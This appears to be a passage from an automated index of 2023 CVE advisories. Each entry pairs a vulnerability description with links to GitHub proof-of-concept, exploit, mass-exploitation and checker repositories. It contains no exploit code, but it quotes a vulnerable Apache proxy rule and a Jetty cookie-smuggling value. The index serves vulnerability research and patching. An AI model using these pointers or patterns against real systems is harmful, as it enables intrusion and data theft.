In Stimulsoft Designer (Desktop) 2023.1.5, and 2023.1.4, once an attacker decompiles the Stimulsoft.report.dll the attacker is able to decrypt any connectionstring stored in .mrt files since a static secret is used. The secret does not differ between the tested versions and different operating systems.

- [trustcves/CVE-2023-25263](https://github.com/trustcves/CVE-2023-25263)

### CVE-2023-25292 (2023-04-27)

Reflected Cross Site Scripting (XSS) in Intermesh BV Group-Office version 6.6.145, allows attackers to gain escalated privileges and gain sensitive information via the GO_LANGUAGE cookie.

- [brainkok/CVE-2023-25292](https://github.com/brainkok/CVE-2023-25292)
- [tucommenceapousser/CVE-2023-25292](https://github.com/tucommenceapousser/CVE-2023-25292)

### CVE-2023-25355 (2023-04-04)

CoreDial sipXcom up to and including 21.04 is vulnerable to Insecure Permissions. A user who has the ability to run commands as the `daemon` user on a sipXcom server can overwrite a service file, and escalate their privileges to `root`.

- [glefait/CVE-2023-25355-25356](https://github.com/glefait/CVE-2023-25355-25356)

### CVE-2023-25581
- [p33d/CVE-2023-25581](https://github.com/p33d/CVE-2023-25581)

### CVE-2023-25610
- [qi4L/CVE-2023-25610](https://github.com/qi4L/CVE-2023-25610)

### CVE-2023-25690 (2023-03-07)

Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 allow an HTTP Request Smuggling attack.

Configurations are affected when mod_proxy is enabled along with some form of RewriteRule or ProxyPassMatch in which a non-specific pattern matches some portion of the user-supplied request-target (URL) data and is then re-inserted into the proxied request-target using variable substitution. For example, something like:

    RewriteEngine on
    RewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1"; [P]
    ProxyPassReverse /here/ http://example.com:8080/

Request splitting/smuggling could result in bypass of access controls in the proxy server, proxying unintended URLs to existing origin servers, and cache poisoning. Users are recommended to update to at least version 2.4.56 of Apache HTTP Server.

- [tbachvarova/linux-apache-fix-mod_rewrite-spaceInURL](https://github.com/tbachvarova/linux-apache-fix-mod_rewrite-spaceInURL)
- [dhmosfunk/CVE-2023-25690-POC](https://github.com/dhmosfunk/CVE-2023-25690-POC)
- [thanhlam-attt/CVE-2023-25690](https://github.com/thanhlam-attt/CVE-2023-25690)

### CVE-2023-25725 (2023-02-14)

HAProxy before 2.7.3 may allow a bypass of access control because HTTP/1 headers are inadvertently lost in some situations, aka "request smuggling." The HTTP header parsers in HAProxy may accept empty header field names, which could be used to truncate the list of HTTP headers and thus make some headers disappear after being parsed and processed for HTTP/1.0 and HTTP/1.1. For HTTP/2 and HTTP/3, the impact is limited because the headers disappear before being parsed and processed, as if they had not been sent by the client. The fixed versions are 2.7.3, 2.6.9, 2.5.12, 2.4.22, 2.2.29, and 2.0.31.

- [sgwgsw/LAB-CVE-2023-25725](https://github.com/sgwgsw/LAB-CVE-2023-25725)

### CVE-2023-25813 (2023-02-22)

Sequelize is a Node.js ORM tool. In versions prior to 6.19.1 a SQL injection exploit exists related to replacements. Parameters which are passed through replacements are not properly escaped which can lead to arbitrary SQL injection depending on the specific queries in use. The issue has been fixed in Sequelize 6.19.1. Users are advised to upgrade. Users unable to upgrade should not use the `replacements` and the `where` option in the same query.

- [bde574786/Sequelize-1day-CVE-2023-25813](https://github.com/bde574786/Sequelize-1day-CVE-2023-25813)
- [White-BAO/CVE-2023-25813](https://github.com/White-BAO/CVE-2023-25813)

### CVE-2023-25950 (2023-04-11)

HTTP request/response smuggling vulnerability in HAProxy version 2.7.0, and 2.6.1 to 2.6.7 allows a remote attacker to alter a legitimate user's request. As a result, the attacker may obtain sensitive information or cause a denial-of-service (DoS) condition.

- [dhmosfunk/HTTP3ONSTEROIDS](https://github.com/dhmosfunk/HTTP3ONSTEROIDS)

### CVE-2023-26035 (2023-02-25)

ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution via Missing Authorization. There is no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id. This issue is fixed in versions 1.36.33 and 1.37.33.

- [rvizx/CVE-2023-26035](https://github.com/rvizx/CVE-2023-26035)
- [m3m0o/zoneminder-snapshots-rce-poc](https://github.com/m3m0o/zoneminder-snapshots-rce-poc)
- [heapbytes/CVE-2023-26035](https://github.com/heapbytes/CVE-2023-26035)
- [Yuma-Tsushima07/CVE-2023-26035](https://github.com/Yuma-Tsushima07/CVE-2023-26035)
- [0xfalafel/zoneminder_CVE-2023-26035](https://github.com/0xfalafel/zoneminder_CVE-2023-26035)

### CVE-2023-26048 (2023-04-18)

Jetty is a java based web server and servlet engine. In affected versions servlets with multipart support (e.g. annotated with `@MultipartConfig`) that call `HttpServletRequest.getParameter()` or `HttpServletRequest.getParts()` may cause `OutOfMemoryError` when the client sends a multipart request with a part that has a name but no filename and very large content. This happens even with the default settings of `fileSizeThreshold=0` which should stream the whole part content to disk. An attacker client may send a large multipart request and cause the server to throw `OutOfMemoryError`. However, the server may be able to recover after the `OutOfMemoryError` and continue its service -- although it may take some time. This issue has been patched in versions 9.4.51, 10.0.14, and 11.0.14. Users are advised to upgrade. Users unable to upgrade may set the multipart parameter `maxRequestSize` which must be set to a non-negative value, so the whole multipart content is limited (although still read into memory).

- [Trinadh465/jetty_9.4.31_CVE-2023-26048](https://github.com/Trinadh465/jetty_9.4.31_CVE-2023-26048)
- [hshivhare67/Jetty-v9.4.31_CVE-2023-26048](https://github.com/hshivhare67/Jetty-v9.4.31_CVE-2023-26048)

### CVE-2023-26049 (2023-04-18)

Jetty is a java based web server and servlet engine. Nonstandard cookie parsing in Jetty may allow an attacker to smuggle cookies within other cookies, or otherwise perform unintended behavior by tampering with the cookie parsing mechanism. If Jetty sees a cookie VALUE that starts with `"` (double quote), it will continue to read the cookie string until it sees a closing quote -- even if a semicolon is encountered. So, a cookie header such as: `DISPLAY_LANGUAGE="b; JSESSIONID=1337; c=d"` will be parsed as one cookie, with the name DISPLAY_LANGUAGE and a value of b; JSESSIONID=1337; c=d instead of 3 separate cookies. This has security implications because if, say, JSESSIONID is an HttpOnly cookie, and the DISPLAY_LANGUAGE cookie value is rendered on the page, an attacker can smuggle the JSESSIONID cookie into the DISPLAY_LANGUAGE cookie and thereby exfiltrate it. This is significant when an intermediary is enacting some policy based on cookies, so a smuggled cookie can bypass that policy yet still be seen by the Jetty server or its logging system. This issue has been addressed in versions 9.4.51, 10.0.14, 11.0.14, and 12.0.0.beta0 and users are advised to upgrade. There are no known workarounds for this issue.

- [hshivhare67/Jetty_v9.4.31_CVE-2023-26049](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2023-26049)

### CVE-2023-26067 (2023-04-10)

Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).

- [horizon3ai/CVE-2023-26067](https://github.com/horizon3ai/CVE-2023-26067)

### CVE-2023-26136 (2023-07-01)

Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.

- [CUCUMBERanOrSNCompany/SealSecurityAssignment](https://github.com/CUCUMBERanOrSNCompany/SealSecurityAssignment)
- [ronmadar/Open-Source-Seal-Security](https://github.com/ronmadar/Open-Source-Seal-Security)
- [m-lito13/SealSecurity_Exam](https://github.com/m-lito13/SealSecurity_Exam)

### CVE-2023-26144 (2023-09-20)

Versions of the package graphql from 16.3.0 and before 16.8.1 are vulnerable to Denial of Service (DoS) due to insufficient checks in the OverlappingFieldsCanBeMergedRule.ts file when parsing large queries. This vulnerability allows an attacker to degrade system performance.

**Note:** It was not proven that this vulnerability can crash the process.

- [tadhglewis/apollo-koa-minimal](https://github.com/tadhglewis/apollo-koa-minimal)

### CVE-2023-26255 (2023-02-28)

An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjCustomDesignConfig endpoint, it is possible to traverse and read the file system.

- [tucommenceapousser/CVE-2023-26255-Exp](https://github.com/tucommenceapousser/CVE-2023-26255-Exp)
- [Nian-Stars/CVE-2023-26255-6](https://github.com/Nian-Stars/CVE-2023-26255-6)

### CVE-2023-26256 (2023-02-28)

An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjFooterNavigationConfig endpoint, it is possible to traverse and read the file system.

- [0x7eTeam/CVE-2023-26256](https://github.com/0x7eTeam/CVE-2023-26256)
- [xhs-d/CVE-2023-26256](https://github.com/xhs-d/CVE-2023-26256)
- [qs119/CVE-2023-26256](https://github.com/qs119/CVE-2023-26256)
- [jcad123/CVE-2023-26256](https://github.com/jcad123/CVE-2023-26256)

### CVE-2023-26258 (2023-07-03)

Arcserve UDP through 9.0.6034 allows authentication bypass. The method getVersionInfo at WebServiceImpl/services/FlashServiceImpl leaks the AuthUUID token. This token can be used at /WebServiceImpl/services/VirtualStandbyServiceImpl to obtain a valid session. This session can be used to execute any task as administrator.

- [mdsecactivebreach/CVE-2023-26258-ArcServe](https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe)

### CVE-2023-26262 (2023-03-14)

An issue was discovered in Sitecore XP/XM 10.3. As an authenticated Sitecore user, an unrestricted language file upload vulnerability exists that can lead to direct code execution on the content management (CM) server.

- [istern/CVE-2023-26262](https://github.com/istern/CVE-2023-26262)

### CVE-2023-26269 (2023-04-03)

Apache James server version 3.7.3 and earlier provides a JMX management service without authentication by default. This allows privilege escalation by a malicious local user.

Administrators are advised to disable JMX, or set up a JMX password.

Note that version 3.7.4 onward will set up a JMX password automatically for Guice users.

- [mbadanoiu/CVE-2023-26269](https://github.com/mbadanoiu/CVE-2023-26269)

### CVE-2023-26360 (2023-03-23)

Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by an Improper Access Control vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction.

- [yosef0x01/CVE-2023-26360](https://github.com/yosef0x01/CVE-2023-26360)
- [jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit](https://github.com/jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit)
- [CuriousLearnerDev/ColdFusion_EXp](https://github.com/CuriousLearnerDev/ColdFusion_EXp)

### CVE-2023-26469 (2023-08-17)

In Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.

- [d0rb/CVE-2023-26469](https://github.com/d0rb/CVE-2023-26469)

### CVE-2023-26563 (2023-07-12)

The Syncfusion EJ2 Node File Provider 0102271 is vulnerable to filesystem-server.js directory traversal. As a result, an unauthenticated attacker can: - On Windows, list files in any directory, read any file, delete any file, upload any file to any directory accessible by the web server. - On Linux, read any file, download any directory, delete any file, upload any file to any directory accessible by the web server.

- [RupturaInfoSec/CVE-2023-26563-26564-26565](https://github.com/RupturaInfoSec/CVE-2023-26563-26564-26565)

### CVE-2023-26602 (2023-02-26)

ASUS ASMB8 iKVM firmware through 1.14.51 allows remote attackers to execute arbitrary code by using SNMP to create extensions, as demonstrated by snmpset for NET-SNMP-EXTEND-MIB with /bin/sh for command execution.

- [D1G17/CVE-2023-26602](https://github.com/D1G17/CVE-2023-26602)

### CVE-2023-26607 (2023-02-26)

In the Linux kernel 6.0.8, there is an out-of-bounds read in ntfs_attr_find in fs/ntfs/attrib.c.

- [Trinadh465/linux-4.1.15_CVE-2023-26607](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-26607)

### CVE-2023-26609 (2023-02-27)

ABUS TVIP 20000-21150 devices allow remote attackers to execute arbitrary code via shell metacharacters in the /cgi-bin/mft/wireless_mft ap field.

- [D1G17/CVE-2023-26609](https://github.com/D1G17/CVE-2023-26609)

### CVE-2023-26692 (2023-03-30)

ZCBS Zijper Collectie Beheer Systeem (ZCBS), Zijper Publication Management System (ZPBS), and Zijper Image Bank Management System (ZBBS) 4.14k are vulnerable to Cross Site Scripting (XSS).

- [bigzooooz/CVE-2023-26692](https://github.com/bigzooooz/CVE-2023-26692)

### CVE-2023-26785
- [Ant1sec-ops/CVE-2023-26785](https://github.com/Ant1sec-ops/CVE-2023-26785)

### CVE-2023-26818 (2023-05-19)

Telegram 9.3.1 and 9.4.0 allows attackers to access restricted files, microphone, or video recording via the DYLD_INSERT_LIBRARIES flag.

- [Zeyad-Azima/CVE-2023-26818](https://github.com/Zeyad-Azima/CVE-2023-26818)

### CVE-2023-26852 (2023-04-12)

An arbitrary file upload vulnerability in the upload plugin of Textpattern v4.8.8 and below allows attackers to execute arbitrary code by uploading a crafted PHP file.

- [leekenghwa/CVE-2023-26852-Textpattern-v4.8.8-and-](https://github.com/leekenghwa/CVE-2023-26852-Textpattern-v4.8.8-and-)

### CVE-2023-26866 (2023-04-04)

GreenPacket OH736's WR-1200 Indoor Unit, OT-235 with firmware versions M-IDU-1.6.0.3_V1.1 and MH-46360-2.0.3-R5-GP respectively are vulnerable to remote command injection. Commands are executed using pre-login execution and executed with root privileges allowing complete takeover.

- [lionelmusonza/CVE-2023-26866](https://github.com/lionelmusonza/CVE-2023-26866)

### CVE-2023-26976 (2023-04-04)

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the ssid parameter in the form_fast_setting_wifi_set function.

- [FzBacon/CVE-2023-26976_tenda_AC6_stack_overflow](https://github.com/FzBacon/CVE-2023-26976_tenda_AC6_stack_overflow)

### CVE-2023-26982 (2023-03-29)

Trudesk v1.2.6 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Tags parameter under the Create Ticket function.

- [bypazs/CVE-2023-26982](https://github.com/bypazs/CVE-2023-26982)
- [bypazs/Duplicate-of-CVE-2023-26982](https://github.com/bypazs/Duplicate-of-CVE-2023-26982)

### CVE-2023-26984 (2023-03-29)

An issue in the password reset function of Peppermint v0.2.4 allows attackers to access the emails and passwords of the Tickets page via a crafted request.

- [bypazs/CVE-2023-26984](https://github.com/bypazs/CVE-2023-26984)

### CVE-2023-27035 (2023-05-01)

An issue discovered in Obsidian Canvas 1.1.9 allows remote attackers to send desktop notifications, record user audio and other unspecified impacts via embedded website on the canvas page.

- [fivex3/CVE-2023-27035](https://github.com/fivex3/CVE-2023-27035)

### CVE-2023-27100 (2023-03-22)

Improper restriction of excessive authentication attempts in the SSHGuard component of Netgate pfSense Plus software v22.05.1 and pfSense CE software v2.6.0 allows attackers to bypass brute force protection mechanisms via crafted web requests.

- [DarokNET/CVE-2023-27100](https://github.com/DarokNET/CVE-2023-27100)
- [fabdotnet/CVE-2023-27100](https://github.com/fabdotnet/CVE-2023-27100)

### CVE-2023-27163 (2023-03-31)

request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.

- [entr0pie/CVE-2023-27163](https://github.com/entr0pie/CVE-2023-27163)
- [seanrdev/cve-2023-27163](https://github.com/seanrdev/cve-2023-27163)
- [overgrowncarrot1/CVE-2023-27163](https://github.com/overgrowncarrot1/CVE-2023-27163)
- [ThickCoco/CVE-2023-27163-POC](https://github.com/ThickCoco/CVE-2023-27163-POC)
- [davuXVI/CVE-2023-27163](https://github.com/davuXVI/CVE-2023-27163)
- [HusenjanDev/CVE-2023-27163-AND-Mailtrail-v0.53](https://github.com/HusenjanDev/CVE-2023-27163-AND-Mailtrail-v0.53)
- [rvizx/CVE-2023-27163](https://github.com/rvizx/CVE-2023-27163)
- [thomas-osgood/CVE-2023-27163](https://github.com/thomas-osgood/CVE-2023-27163)
- [cowsecurity/CVE-2023-27163](https://github.com/cowsecurity/CVE-2023-27163)
- [samh4cks/CVE-2023-27163-InternalProber](https://github.com/samh4cks/CVE-2023-27163-InternalProber)
- [Hamibubu/CVE-2023-27163](https://github.com/Hamibubu/CVE-2023-27163)
- [KharimMchatta/basketcraft](https://github.com/KharimMchatta/basketcraft)
- [MasterCode112/CVE-2023-27163](https://github.com/MasterCode112/CVE-2023-27163)
- [Rubioo02/CVE-2023-27163](https://github.com/Rubioo02/CVE-2023-27163)
- [madhavmehndiratta/CVE-2023-27163](https://github.com/madhavmehndiratta/CVE-2023-27163)
- [Rishabh-Kumar-Cyber-Sec/CVE-2023-27163-ssrf-to-port-scanning](https://github.com/Rishabh-Kumar-Cyber-Sec/CVE-2023-27163-ssrf-to-port-scanning)
- [btar1gan/exploit_CVE-2023-27163](https://github.com/btar1gan/exploit_CVE-2023-27163)

### CVE-2023-27216 (2023-04-12)

An issue found in D-Link DSL-3782 v.1.03 allows remote authenticated users to execute arbitrary code as root via the network settings page.

- [FzBacon/CVE-2023-27216_D-Link_DSL-3782_Router_command_injection](https://github.com/FzBacon/CVE-2023-27216_D-Link_DSL-3782_Router_command_injection)
- [HoangREALER/CVE-2023-27216](https://github.com/HoangREALER/CVE-2023-27216)

### CVE-2023-27326 (2024-05-03)

Parallels Desktop Toolgate Directory Traversal Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability.

The specific flaw exists within the Toolgate component. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the current user on the host system. Was ZDI-CAN-18933.

- [Impalabs/CVE-2023-27326](https://github.com/Impalabs/CVE-2023-27326)
- [Malwareman007/CVE-2023-27326](https://github.com/Malwareman007/CVE-2023-27326)

### CVE-2023-27327 (2024-05-03)

Parallels Desktop Toolgate Time-Of-Check Time-Of-Use Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability.

The specific flaw exists within the Toolgate component. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the current user on the host system. Was ZDI-CAN-18964.

- [kn32/parallels-plist-escape](https://github.com/kn32/parallels-plist-escape)

### CVE-2023-27350 (2023-04-20)

This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.

- [MaanVader/CVE-2023-27350-POC](https://github.com/MaanVader/CVE-2023-27350-POC)
- [imancybersecurity/CVE-2023-27350-POC](https://github.com/imancybersecurity/CVE-2023-27350-POC)
- [horizon3ai/CVE-2023-27350](https://github.com/horizon3ai/CVE-2023-27350)
- [adhikara13/CVE-2023-27350](https://github.com/adhikara13/CVE-2023-27350)
- [ThatNotEasy/CVE-2023-27350](https://github.com/ThatNotEasy/CVE-2023-27350)
- [Jenderal92/CVE-2023-27350](https://github.com/Jenderal92/CVE-2023-27350)
- [ASG-CASTLE/CVE-2023-27350](https://github.com/ASG-CASTLE/CVE-2023-27350)
- [rasan2001/CVE-2023-27350-Ongoing-Exploitation-of-PaperCut-Remote-Code-Execution-Vulnerability](https://github.com/rasan2001/CVE-2023-27350-Ongoing-Exploitation-of-PaperCut-Remote-Code-Execution-Vulnerability)

### CVE-2023-27363 (2024-05-03)

Foxit PDF Reader exportXFAData Exposed Dangerous Method Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the exportXFAData method. The application exposes a JavaScript interface that allows writing arbitrary files. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-19697.

- [qwqdanchun/CVE-2023-27363](https://github.com/qwqdanchun/CVE-2023-27363)
- [webraybtl/CVE-2023-27363](https://github.com/webraybtl/CVE-2023-27363)
- [CN016/-Foxit-PDF-CVE-2023-27363-](https://github.com/CN016/-Foxit-PDF-CVE-2023-27363-)

### CVE-2023-27372 (2023-02-28)

SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.

- [nuts7/CVE-2023-27372](https://github.com/nuts7/CVE-2023-27372)
- [Chocapikk/CVE-2023-27372](https://github.com/Chocapikk/CVE-2023-27372)
- [dream434/CVE-2023-27372](https://github.com/dream434/CVE-2023-27372)
- [0SPwn/CVE-2023-27372-PoC](https://github.com/0SPwn/CVE-2023-27372-PoC)
- [izzz0/CVE-2023-27372-POC](https://github.com/izzz0/CVE-2023-27372-POC)
- [ThatNotEasy/CVE-2023-27372](https://github.com/ThatNotEasy/CVE-2023-27372)
- [redboltsec/CVE-2023-27372-PoC](https://github.com/redboltsec/CVE-2023-27372-PoC)
- [1amthebest1/CVE-2023-27372](https://github.com/1amthebest1/CVE-2023-27372)

### CVE-2023-27470 (2023-09-11)

BASupSrvcUpdater.exe in N-able Take Control Agent through 7.0.41.1141 before 7.0.43 has a TOCTOU Race Condition via a pseudo-symlink at %PROGRAMDATA%\GetSupportService_N-Central\PushUpdates, leading to arbitrary file deletion.

- [3lp4tr0n/CVE-2023-27470_Exercise](https://github.com/3lp4tr0n/CVE-2023-27470_Exercise)

### CVE-2023-27524 (2023-04-24)

Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.

All superset installations should always set a unique secure random SECRET_KEY. Your SECRET_KEY is used to securely sign all session cookies and to encrypt sensitive information in the database. Add a strong SECRET_KEY to your `superset_config.py` file like:

    SECRET_KEY = <YOUR_OWN_RANDOM_GENERATED_SECRET_KEY>

Alternatively you can set it with the `SUPERSET_SECRET_KEY` environment variable.

- [horizon3ai/CVE-2023-27524](https://github.com/horizon3ai/CVE-2023-27524)
- [Okaytc/Superset_auth_bypass_check](https://github.com/Okaytc/Superset_auth_bypass_check)
- [ZZ-SOCMAP/CVE-2023-27524](https://github.com/ZZ-SOCMAP/CVE-2023-27524)
- [MaanVader/CVE-2023-27524-POC](https://github.com/MaanVader/CVE-2023-27524-POC)
- [ThatNotEasy/CVE-2023-27524](https://github.com/ThatNotEasy/CVE-2023-27524)
- [TardC/CVE-2023-27524](https://github.com/TardC/CVE-2023-27524)
- [necroteddy/CVE-2023-27524](https://github.com/necroteddy/CVE-2023-27524)
- [jakabakos/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE](https://github.com/jakabakos/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE)
- [CN016/Apache-Superset-SECRET_KEY-CVE-2023-27524-](https://github.com/CN016/Apache-Superset-SECRET_KEY-CVE-2023-27524-)
- [NguyenCongHaiNam/Research-CVE-2023-27524](https://github.com/NguyenCongHaiNam/Research-CVE-2023-27524)
- [karthi-the-hacker/CVE-2023-27524](https://github.com/karthi-the-hacker/CVE-2023-27524)
- [Cappricio-Securities/CVE-2023-27524](https://github.com/Cappricio-Securities/CVE-2023-27524)

### CVE-2023-27532 (2023-03-10)

Vulnerability in Veeam Backup & Replication component allows encrypted credentials stored in the configuration database to be obtained. This may lead to gaining access to the backup infrastructure hosts.

- [horizon3ai/CVE-2023-27532](https://github.com/horizon3ai/CVE-2023-27532)
- [sfewer-r7/CVE-2023-27532](https://github.com/sfewer-r7/CVE-2023-27532)
- [puckiestyle/CVE-2023-27532-RCE-Only](https://github.com/puckiestyle/CVE-2023-27532-RCE-Only)

### CVE-2023-27564 (2023-05-10)

The n8n package 0.218.0 for Node.js allows Information Disclosure.

- [david-botelho-mariano/exploit-CVE-2023-27564](https://github.com/david-botelho-mariano/exploit-CVE-2023-27564)

### CVE-2023-27566 (2023-03-03)

Cubism Core in Live2D Cubism Editor 4.2.03 allows out-of-bounds write via a crafted Section Offset Table or Count Info Table in an MOC3 file.

- [OpenL2D/moc3ingbird](https://github.com/OpenL2D/moc3ingbird)

### CVE-2023-27587 (2023-03-13)

ReadtoMyShoe, a web app that lets users upload articles and listen to them later, generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, then it will include the full URL of the request. The request URL contains the Google Cloud API key. This has been patched in commit 8533b01. Upgrading should be accompanied by deleting the current GCP API key and issuing a new one. There are no known workarounds.

- [vagnerd/CVE-2023-27587-PoC](https://github.com/vagnerd/CVE-2023-27587-PoC)

### CVE-2023-27703 (2023-04-12)

The Android version of pikpak v1.29.2 was discovered to contain an information leak via the debug interface.

- [happy0717/CVE-2023-27703](https://github.com/happy0717/CVE-2023-27703)

### CVE-2023-27704 (2023-04-12)

Void Tools Everything lower than v1.4.1.1022 was discovered to contain a Regular Expression Denial of Service (ReDoS).

- [happy0717/CVE-2023-27704](https://github.com/happy0717/CVE-2023-27704)

### CVE-2023-27742 (2023-05-16)

IDURAR ERP/CRM v1 was discovered to contain a SQL injection vulnerability via the component /api/login.

- [G37SYS73M/CVE-2023-27742](https://github.com/G37SYS73M/CVE-2023-27742)

### CVE-2023-27746 (2023-04-13)

BlackVue DR750-2CH LTE v.1.012_2022.10.26 was discovered to contain a weak default passphrase which can be easily cracked via a brute force attack if the WPA2 handshake is intercepted.

- [eyJhb/blackvue-cve-2023](https://github.com/eyJhb/blackvue-cve-2023)

### CVE-2023-27842 (2023-03-21)

Insecure Permissions vulnerability found in Extplorer File manager eXtplorer v.2.1.15 allows a remote attacker to execute arbitrary code via the index.php component.

- [tristao-marinho/CVE-2023-27842](https://github.com/tristao-marinho/CVE-2023-27842)
- [cowsecurity/CVE-2023-27842](https://github.com/cowsecurity/CVE-2023-27842)

### CVE-2023-27997 (2023-06-13)

A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests.

- [rio128128/CVE-2023-27997-POC](https://github.com/rio128128/CVE-2023-27997-POC)
- [BishopFox/CVE-2023-27997-check](https://github.com/BishopFox/CVE-2023-27997-check)
- [imbas007/CVE-2023-27997-Check](https://github.com/imbas007/CVE-2023-27997-Check)
- [puckiestyle/cve-2023-27997](https://github.com/puckiestyle/cve-2023-27997)
- [TechinsightsPro/ShodanFortiOS](https://github.com/TechinsightsPro/ShodanFortiOS)
- [Cyb3rEnthusiast/CVE-2023-27997](https://github.com/Cyb3rEnthusiast/CVE-2023-27997)
- [lexfo/xortigate-cve-2023-27997](https://github.com/lexfo/xortigate-cve-2023-27997)
- [delsploit/CVE-2023-27997](https://github.com/delsploit/CVE-2023-27997)

### CVE-2023-28121 (2023-04-12)

An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.

- [gbrsh/CVE-2023-28121](https://github.com/gbrsh/CVE-2023-28121)
- [im-hanzou/Mass-CVE-2023-28121](https://github.com/im-hanzou/Mass-CVE-2023-28121)
- [rio128128/Mass-CVE-2023-28121-kdoec](https://github.com/rio128128/Mass-CVE-2023-28121-kdoec)
- [C04LA/CVE-2023-28121](https://github.com/C04LA/CVE-2023-28121)
- [Jenderal92/WP-CVE-2023-28121](https://github.com/Jenderal92/WP-CVE-2023-28121)
- [1337nemojj/CVE-2023-28121](https://github.com/1337nemojj/CVE-2023-28121)

### CVE-2023-28197 (2024-01-10)

An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Ventura 13.3, macOS Big Sur 11.7.5, macOS Monterey 12.6.4. An app may be able to access user-sensitive data.

- [spotlightishere/inputcontrol](https://github.com/spotlightishere/inputcontrol)

### CVE-2023-28206 (2023-04-10)

An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1, iOS 15.7.5 and iPadOS 15.7.5, macOS Big Sur 11.7.6. An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.

- [acceleratortroll/acceleratortroll](https://github.com/acceleratortroll/acceleratortroll)

### CVE-2023-28218 (2023-04-11)

Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability

- [h1bAna/CVE-2023-28218](https://github.com/h1bAna/CVE-2023-28218)

### CVE-2023-28229 (2023-04-11)

Windows CNG Key Isolation Service Elevation of Privilege Vulnerability

- [Y3A/CVE-2023-28229](https://github.com/Y3A/CVE-2023-28229)
- [byt3n33dl3/CrackKeyIso](https://github.com/byt3n33dl3/CrackKeyIso)

### CVE-2023-28231 (2023-04-11)

DHCP Server Service Remote Code Execution Vulnerability

- [TheHermione/CVE-2023-28231](https://github.com/TheHermione/CVE-2023-28231)

### CVE-2023-28244 (2023-04-11)

Windows Kerberos Elevation of Privilege Vulnerability

- [sk3w/cve-2023-28244](https://github.com/sk3w/cve-2023-28244)

### CVE-2023-28252 (2023-04-11)

Windows Common Log File System Driver Elevation of Privilege Vulnerability

- [fortra/CVE-2023-28252](https://github.com/fortra/CVE-2023-28252)
- [726232111/CVE-2023-28252](https://github.com/726232111/CVE-2023-28252)
- [Danasuley/CVE-2023-28252-](https://github.com/Danasuley/CVE-2023-28252-)
- [bkstephen/Compiled-PoC-Binary-For-CVE-2023-28252](https://github.com/bkstephen/Compiled-PoC-Binary-For-CVE-2023-28252)
- [duck-sec/CVE-2023-28252-Compiled-exe](https://github.com/duck-sec/CVE-2023-28252-Compiled-exe)
- [byt3n33dl3/CLFS](https://github.com/byt3n33dl3/CLFS)
